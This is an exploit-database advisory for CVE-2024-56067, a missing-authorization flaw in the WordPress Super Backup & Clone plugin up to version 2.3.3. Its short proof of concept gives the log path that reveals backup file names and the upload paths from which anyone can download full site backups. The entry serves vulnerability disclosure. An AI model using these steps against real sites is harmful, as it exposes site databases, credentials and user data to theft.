id: 39871
date: 01/15/2025
title: WordPress SuperBackup 2.3.3 Missing Authorization Vulnerability
author: RandomRobbieBF
cves: CVE-2024-56067

# CVE-2024-56067
WP SuperBackup <= 2.3.3 - Missing Authorization to Unauthenticated Back-Up File Download

# Description

The Super Backup & Clone - Migrate for WordPress plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to download entire back-ups.

## Details

- **Type**: plugin
- **Slug**: indeed-wp-superbackup
- **Affected Version**: 2.3.3
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2024-56067
- **Status**: Private

POC
---
```
/wp-content/uploads/indeed-backups/ibk_global_log.log find the file name then go to /wp-content/uploads/isnapshots/superbackup_df5587df9946d3d62fc24aa8f8783551_1_1481824758.zip or /uploads/indeed-wp-superbackup/superbackup_df5587df9946d3d62fc24aa8f8783551_1_1481824758.zip depending if it's a snapshot or not.
```

#  0day.today [2025-01-20]  #